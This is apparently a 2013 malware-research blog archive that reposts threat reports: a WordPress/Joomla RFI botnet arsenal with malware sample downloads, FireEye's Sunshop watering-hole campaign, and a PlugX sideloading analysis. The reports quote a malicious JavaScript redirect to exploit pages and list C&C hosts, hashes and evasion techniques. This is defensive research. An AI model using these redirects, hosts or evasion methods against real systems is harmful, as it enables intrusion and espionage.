Monthly Archives: May 2013

DeepEnd Research: Under this rock… Vulnerable WordPress/Joomla sites… Overview of the RFI botnet malware arsenal


Exploits directed at Wordpress and/or Joomla content management systems(CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are being performed via automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved.

One such infection scheme is essentially the following:

A downloader trojan  (Mutopy  - Win32) (20a6ebf61243b760dd65f897236b6ad3 Virustotal) instructs the infected host to download:
1) Remote File Injector "Symmi" (Win32) 7958f73daf4b84e3b00e008258ea2e7a Virustotal 
2) SDbot (Win32) - aaee52bfb589f6534c4b51e3b144dc08 Virustotal 
3) PHP scripts for injecting into compromised Wordpress sites. Among them a PHP spambot (victimized site owners often get alerted about copious amount of meds and spam porn emanating from their sites). This is also the source of varied links for spam using thousands of various links redirecting to the same sites (e.g. weightloss, work at home scams, or porn sites)

Read more at DeepEnd Research>>>

Download files (see below)



Download the nalware files (Email me if you need the password)
Download the pcap files (Email me if you need the password)


Wordpress_PHP_1FFD37807740EBCB7DAD044ACF866100_up.php 1ffd37807740ebcb7dad044acf866100
Wordpress_PHP_5F0BB0851B3A2838C34CF21400F22A7E_copy.php 5f0bb0851b3a2838c34cf21400f22a7e
Wordpress_PHP_7CCDCC3FF09262CAFE5DC953C0552254_seek.cgi 7ccdcc3ff09262cafe5dc953c0552254
Wordpress_PHP_9B6D87C50B58104E204481C580E630F1_sm14e.php 9b6d87c50b58104e204481c580e630f1
Wordpress_PHP_35DBB397351622B86E421EE8ABA095DE_fu.php 35dbb397351622b86e421ee8aba095de
Wordpress_PHP_45B02538063124A0FECC0987410B1A65_ru.php 45b02538063124a0fecc0987410b1a65
Wordpress_PHP_821BB092136A73EAA2CA803E6DBB658A_del.php 821bb092136a73eaa2ca803e6dbb658a

Wordpress-Mutopy_20A6EBF61243B760DD65F897236B6AD3.exe_ 20a6ebf61243b760dd65f897236b6ad3
Wordpress_DroppedbyMutopy_93F2D4ED74F7CCBF8E41F4D9D0B3BF98_Twain002.Mtx_ 93f2d4ed74f7ccbf8e41f4d9d0b3bf98
Wordpress_SDbot_AAEE52BFB589F6534C4B51E3B144DC08_svchost.exe_ aaee52bfb589f6534c4b51e3b144dc08
Worpress_Symmi_7958F73DAF4B84E3B00E008258EA2E7A_conhost.exe_ 7958f73daf4b84e3b00e008258ea2e7a

Ready for Summer: The Sunshop Campaign

FireEye recently identified another targeted attack campaign that leveraged both the recently announced Internet Explorer zero-day, CVE-2013-1347, as well as recently patched Java exploits CVE-2013-2423 and CVE-2013-1493. This campaign appears to have affected a number of victims based on the use of the Internet Explorer zero-day as well as the amount of traffic observed at making requests to the exploit server. This attack was likely executed by an actor we have named the 'Sunshop Group'. This actor was also responsible for the 2010 compromise of the Nobel Peace Prize website that leverage a zero-day in Mozilla Firefox.

Impacted Sites

The campaign in question compromised a number of strategic websites including:

• Multiple Korean military and strategy think tanks

• A Uyghur news and discussion forum

• A science and technology policy journal

• A website for evangelical students

A call to a malicious javascript file hosted at www[.]sunshop[.]com[.]tw was inserted into all of these compromised websites.

The Exploit Server

If a visitor to one of these compromised website was running Internet Explorer 8.0 the malicious javascript would redirect them to a page at www[.]sunshop[.]com[.]tw hosting a CVE-2013-1347 exploit. Any other victims were redirected to a page that downloaded two malicious jars.

if(browser=="Microsoft Internet Explorer" && trim_Version=="MSIE8.0" && window.navigator.userLanguage.indexOf("en")>-1)

{

if(sys_Version=="WindowsNT5.1")

{

showexp("hxxp://www[.]sunshop[.]com[.]tw/xxxxxx/xxxxximg.html");

}

else

showexp("hxxp://www[.]sunshop[.]com[.]tw/xxxxxx/xxxxxxxmig.html");//J

}

else

showexp("hxxp://www[.]sunshop[.]com[.]tw/xxxxxx/xxxxxxxmig.html");//J

Dropped Payloads and C&C Infrastructure

The Internet Explorer (CVE-2013-1347) exploit code pulled down a “9002” RAT from another compromised site at hk[.]sz181[.]com. This payload had an MD5 of b0ef2ab86f160aa416184c09df8388fe and connected to a command and control server at dns[.]homesvr[.]tk.

The java exploits were packaged as two different jar files. One jar file had a MD5 of f4bee1e845137531f18c226d118e06d7 and exploited CVE-2013-2423. The second jar file had a MD5 of 3fbb7321d8610c6e2d990bb25ce34bec and exploited CVE-2013-1493.

The jar that exploited CVE-2013-2423 dropped a 9002 RAT with a MD5 of d99ed31af1e0ad6fb5bf0f116063e91f. This RAT connected to a command and control server at asp[.]homesvr[.]linkpc[.]net. The jar that exploited CVE-2013-1493 dropped a 9002 RAT with a MD5 of 42bd5e7e8f74c15873ff0f4a9ce974cd. This RAT connected to a command and control server at ssl[.]homesvr[.]tk.

All of the above 9002 command and control domains resolved to 58.64.205.53. We previously discussed the extensive use of this RAT in other advanced persistent threat (APT) campaigns here.

Related Infrastructure

After further research into 58.64.205.53 with our friends at Mandiant we uncovered a Briba sample with the MD5 6fe0f6e68cd9cc6ed7e100e7b3626665 that connected to this IP address. As seen in this malwr report, the command and control domain of nameserver1[.]zapto[.]org resolved to the same 58.64.205.53 IP address on 2013-05-07. This Briba sample generated the following network traffic to nameserver1[.]zapto[.]org over port 443:

POST /index000001021.asp HTTP/1.1

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)

Host: update.microsoft.com

Connection: Keep-Alive

Content-Type: text/html

Content-Length: 000041

For a detailed analysis of Briba please see Seth Hardy’s paper ‘IExplore RAT’.

The exploit site at sunshop[.]com[.]tw previously hosted a different malicious jar file on April 2, 2013. This jar file had a MD5 of 51aff823274e9d12b1a9a4bbbaf8ce00. It exploited CVE-2013-1493 and dropped a Poison Ivy RAT with the MD5 2B6605B89EAD179710565D1C2B614665. This Poison Ivy RAT connected to a command and control server at 9ijhh45[.]zapto[.]org over port 443 using a password of ‘ult4life’. This domain resolved to the same 58.64.205.53 IP between April 2nd and 8th.

Attribution

The Sunshop Group has utilized the same tactics described above in previous targeted attack campaigns. These similar tactics include the use of zero-day exploits, strategic web compromise as well as Briba malware.

One of the more prominent attacks launched by this group was the compromise of the Nobel Peace Prize Committee’s website in 2010.This attack leveraged a zero-day exploit targeting a previously unknown vulnerability in Mozilla Firefox.

Another publicly documented attack exploited a Flash zero-day and can be found here. Mila at the Contagio Blog posted additional information on this attack here. This attack dropped the same Briba payload discussed above.

FireEye detects the Briba backdoor as Backdoor.APT.IndexASP and the 9002 payloads as Trojan.APT.9002.

Malware

CVE Exploit hash Payload hash Malware family C&C Host C&C IP
CVE-2013-1347 CVE-2013-1347 fb24c49299b197e1b56a1a51430aea26 fb24c49299b197e1b56a1a51430aea26 b0ef2ab86f160aa416184c09df8388fe b0ef2ab86f160aa416184c09df8388fe 9002 9002 dns[.]homesvr[.]tk dns[.]homesvr[.]tk 58.64.205.53 58.64.205.53
CVE-2013-2423 CVE-2013-2423 f4bee1e845137531f18c226d118e06d7 f4bee1e845137531f18c226d118e06d7 d99ed31af1e0ad6fb5bf0f116063e91f d99ed31af1e0ad6fb5bf0f116063e91f 9002 9002 asp[.]homesvr[.]linkpc[.]net asp[.]homesvr[.]linkpc[.]net 58.64.205.53 58.64.205.53
CVE-2013-1493 CVE-2013-1493 3fbb7321d8610c6e2d990bb25ce34bec 3fbb7321d8610c6e2d990bb25ce34bec 42bd5e7e8f74c15873ff0f4a9ce974cd 42bd5e7e8f74c15873ff0f4a9ce974cd 9002 9002 ssl[.]homesvr[.]tk ssl[.]homesvr[.]tk 58.64.205.53 58.64.205.53
Unknown Unknown Unknown Unknown 6fe0f6e68cd9cc6ed7e100e7b3626665 6fe0f6e68cd9cc6ed7e100e7b3626665 Briba Briba nameserver1[.]zapto[.]org nameserver1[.]zapto[.]org 58.64.205.53 58.64.205.53
CVE-2013-1493 CVE-2013-1493 51aff823274e9d12b1a9a4bbbaf8ce00 51aff823274e9d12b1a9a4bbbaf8ce00 2B6605B89EAD179710565D1C2B614665 2B6605B89EAD179710565D1C2B614665 Poison Ivy Poison Ivy 9ijhh45[.]zapto[.]org 9ijhh45[.]zapto[.]org 58.64.205.53 58.64.205.53

Targeted Attack Trend Alert: PlugX the Old Dog With a New Trick

FireEye Labs has discovered a targeted attack towards Chinese political rights activists. The targets appear to be members of social groups that are involved in the political rights movement in China. The email turned up after the attention received in Beijing during the 12th National People's Congress and the 12th National Committee of the Chinese People's Political Consultative Conference, which is the election of a new core of leadership of the Chinese government, to determine the future of China's five-year development plan [1].

The email contains a weaponized attachment that utilizes the Windows Office CVE-2012-0158 exploit to drop the benign payload components and decoy document. The Remote Access Tool (RAT) PlugX itself is known as a combination of benign files that build the malicious execution. The Microsoft file OInfoP11.exe also known as “Office Data Provider for WBEM” is a certified file found in the National Software Reference Library (NIST) and is a component from Microsoft Office 2003 suite. For integrity checking endpoint protection, this file would be deemed as a valid clean file. In Windows 7+ distributions, the svchost.exe will require user interaction by displaying a UAC prompt only if UAC is enabled. Although in Windows XP distributions, this attack does not require user interaction. The major problem is that this file is subject to DLL Sideloading. In previous cases, PlugX has been utilizing similar DLL Sideloading prone files such as a McAfee binary called mcvsmap.exe [2], Intel’s hkcmd.exe [3], and NVIDIA’s NvSmart.exe [4]. In this case, OInfoP11.exe loads a DLL file named OInfo11.ocx (payload loader posing as an ActiveX DLL) that decompresses and decrypts the malicious payload OInfo11.ISO. This technique can be used to evade endpoint security solution that relies on binary signing. Traditional anti-virus (AV) solutions will have a hard time to identify the encrypted and compressed payload. At the time of writing of this blog, there is only 1 out of 46 AV vendors can detect the OInfo11.ocx file.

The diagram in figure 1 shows the behavior and relationship of these files.

5132013image001Figure 1: Attack Diagram

Infiltration

In Figure 2, the targeted email advertises a suffrage movement seminar event. Figure 3 is the contents of the Google document form link that contains the same information as in the email. In figure 4, the decoy document contains the details of the particular seminar section mentioned in the Google document link.

5132013image003

Figure 2: Original Email

Below is the English translation of the email in figure 2.

Li Ping

5132013image005Figure 3: Google Form

Decoy Document

5132013image007Figure 4: Decoy Document

Below is the translation to the document shown above.

The seminar

Attack Analysis

The XLS file (1146fdd6b579ac7144ff575d4d4fa28d) utilizes the CVE-2012-1058 Windows Office exploit to drop the “ews.exe” payload and the decoy document shown in figure 4. This payload extracts the Microsoft file OINFOP11.exe, the benign DLL OInfo11.ocx and encoded and compressed shellcode sections from Oinfo11.ISO. OInfoP11.exe will load OInfo11.ocx as a DLL and once loaded will decompress using RTLDecompressBuffer and decrypt the Oinfo11.ISO to run in memory. The malicious execution is never dropped to the file-system and is therefore not seen by filesystem-based anti-virus detectors. Figure 5 shows the high level view of the relationship of the dropped files.

5132013BLOG2

Figure 5: Payload Relationship

Summary of Dropped Files

Name Md5 Locations Type Encoded/Encrypted Compressed
Ews.exe Ews.exe 721cca40df0f7eab5b5cb069ee8fda9d 721cca40df0f7eab5b5cb069ee8fda9d %TEMP% %TEMP% Exe Exe
OINFOP11.EXE OINFOP11.EXE a31cad2960a660cb558b32ba7236b49e a31cad2960a660cb558b32ba7236b49e %TEMP%\RarSFX0\%ALLUSERSPROFILE%\SXS\ %TEMP%\RarSFX0\%ALLUSERSPROFILE%\SXS\ Exe (clean) Exe (clean)
OInfo11.ocx OInfo11.ocx b355dedbabb145bbf8dd367adac4f8c5 b355dedbabb145bbf8dd367adac4f8c5 %TEMP%\RarSFX0\%ALLUSERSPROFILE%\SXS\ %TEMP%\RarSFX0\%ALLUSERSPROFILE%\SXS\ Binary File Binary File Yes Yes
OInfo11.ISO OInfo11.ISO 128e3fc5ffba06abdd3edab2aff3753f 128e3fc5ffba06abdd3edab2aff3753f %TEMP%\RarSFX0\%ALLUSERSPROFILE%\\SXS\ %TEMP%\RarSFX0\%ALLUSERSPROFILE%\\SXS\ Binary File Binary File Yes Yes Yes Yes

Exploit Details

This malware uses CVE-2012-0158 to drop the payload from the section shown in Figure 6.

5132013_image012

Figure 6: Exploit Payload Section

Shellcode can be found in the first few bytes of this section. Figure 7 shows the disassembly of the code found at the 0x1de0b offset shown in figure 6.

5132013image014

Figure 7: Payload Shellcode

Campaign Characteristics

OInfoP11.exe is a valid Microsoft file and its certificate is shown in figure 8.

5132013_image016

Figure 8: Signature Usage

When the OInfop11.exe is called with the following arguments as C:\Documents and Settings\All Users\SxS\OINFOP11.EXE" 200 0, it will begin the loading of the file OInfo11.ocx.

5132013image019

Figure 10: Loader Entrypoint

The arrow shows the exact jump point where the entrypoint to where the shellcode begins for the decompression and decryption of the ISO file.

5132013_image021

Figure 11: Shellcode Example

This is an example of the memory space of the loaded benign DLL OInfo11.ocx. The functionality of OInfo11.ocx is essentially a loader in which this section decompresses and decrypts the malicious payload in memory.

5132013image023

Figure 12: Decryption of the ISO file

This is the decryption loop used through out the sample. In this instance, it is used to decrypt the ISO shellcode in memory.

5132013image025

Figure 13: DLL location in memory

This is an example of the complete malicious DLL address space in memory.

Entrenchment

Artifacts to watch for:

Mutex   \BaseNamedObjects\oleacc-msaa-loaded
DoInstPrepare
Registry Key Adds Adds Adds \REGISTRY\MACHINE\Software\CLASSES\FAST \REGISTRY\MACHINE\Software\CLASSES\FAST
Registry Key Registry Key Adds Adds \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Security\User Agent\Post Platform
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Security\User Agent\Post Platform
Registry Key Registry Key Sets Value Sets Value \REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware
Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware
Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
Folders and Files Folders and Files Hides Hides %ALLUSERS PROFILE%\SXS\
%ALLUSERS PROFILE%\SXS\OInfo11.ocx
%ALLUSERS PROFILE%\SXS\OInfo11.ISO
%ALLUSERS PROFILE%\SXS\OINFOP11.EXE

5132013image027

Injection

The DLL injects code into svchost using the VirtualAllocEx call then uses WriteProcessMemory to write into the memory space of svchost.exe. The thread is then resumed to run the injected code. This injection process is used for both svchost.exe and msiexec.exe. When svchost.exe spawns msiexec.exe it calls the CreateEnvironmentBlock and the CreateProcessesUser so that the svchost service can launch a user session.

Keylogging Activity

Creates a kellogging file in %ALLUSERS PROFILE%\SXS\ as NvSmart.hlp. Below is an example of the content of this file.

2013

Proxy Establishment

This sample can communicate using ICMP, UDP, HTTP and TCP. In this situation the sample is using the string Protocol:[ TCP], Host: [202.69.69.41:90], Proxy: [0::0::] to establish the proxy for the C&C communication.

5132013image029

Figure 14: Communication Options

Modes of Operation Overview The table below outlines some of the functionality that this variant uses. The options have not changed so therefore this table is used as a refresher. Figure 15 shows an example of how these functions are called by the sample.

Mode Description
Disk Disk Access disk drives to modify the files Access disk drives to modify the files
Nethood Nethood List shares List shares
Netstat Netstat List TCP/UDP connections List TCP/UDP connections
Option Option Send system commands to the workstation such as screen lock Send system commands to the workstation such as screen lock
PortMap PortMap Port mapping Port mapping
Process Process Modify the state of processes Modify the state of processes
RegEdit RegEdit Modify registry keys Modify registry keys
Service Service Modify services Modify services
Shell Shell Communicate through the established name pipe to the C&C server Communicate through the established name pipe to the C&C server
SQL SQL SQL database queries SQL database queries
Telnet Telnet Startup telnet server on the victim Startup telnet server on the victim

5132013image031

Figure 15: Functionality Example

C&C Details and Communication

In figure 16, the sample is communicating to 202.69.69.41 over port 90. The C&C node is down in this case, but the communication is dynamic non-http communication. An example of the callback content is shown in figure 17. This sample will also try to communicate with other instances laterally in the same network. An example of this traffic and content can be seen in figure 18 and figure 19.

5132013image033

Figure 16: PCAP of C&C communication

5132013image035

Figure 17: Callback Traffic

5132013image037

Figure 18: UDP Beacon

5132013image30

Figure 19: UDP packet content

Whois Information on the IP 202.69.69.41

inetnum: 202.69.68.0 - 202.69.71.255

netname: NEWTT-AS-AP

descr: Wharf T&T

Limited descr: 11/F, Telecom Tower,

descr: Wharf T&T Square, 123 Hoi Bun Road

descr: Kwun Tong, Kowloon country: HK

admin-c: EN62-AP

tech-c: BW128-AP

mnt-by: APNIC-HM

mnt-lower: MAINT-HK-NEWTT

mnt-routes: MAINT-HK-NEWTT

mnt-irt: IRT-NEWTT-HK

status: ALLOCATED PORTABLE

remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

remarks: This object can only be updated by APNIC hostmasters.

remarks: To update this object, please contact APNIC

remarks: hostmasters and include your organisation's account

remarks: name in the subject line.

remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+

changed: hm-changed@apnic.net 20120725

source: APNIC

person: Eric Ng

nic-hdl: EN62-AP

remarks: please report spam or abuse to abuse@wharftt.com

e-mail: abuse@wharftt.com

e-mail: ericng@wharftt.com

address: 11/F Telecom Tower, Wharf T&T Square

address: 123 Hoi Bun Road, Kwun Tong,'

phone: +852-2112-2653 fax-no: +852-2112-7883

country: HK changed: ericng@wharftt.com 20070716

mnt-by: MAINT-NEW source: APNIC

person: Benson Wong

nic-hdl: BW128-AP

e-mail: abuse@wharftt.com

address: 5/F, Harbour City, Kowloon,

address: Hong Kong

phone: +852-21122651

fax-no: +852-21127883

country: HK

changed: bensonwong@wharftt.com 20070420

mnt-by: MAINT-HK-NEWTT

source: APNIC

I want to thank the FireEye Labs Team.

[1] http://rmqlxk.blogspot.com/2013/03/blog-post_15.html

[2] http://www.circl.lu/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf

[3] http://lastline.com/an-analysis-of-plugx.php

[4] http://blog.trendmicro.com/trendlabs-security-intelligence/unplugging-plugx-capabilities/

A Saudi Arabia Telecom’s Surveillance Pitch

Last week I was contacted by an agent of Mobily, one of two telecoms operating in Saudi Arabia, about a surveillance project that they’re working on in that country. Having published two reasonably popular MITM tools, it’s not uncommon for me to get emails requesting that I help people with their interception projects. I typically don’t respond, but this one (an email titled “Solution for monitoring encrypted data on telecom”) caught my eye.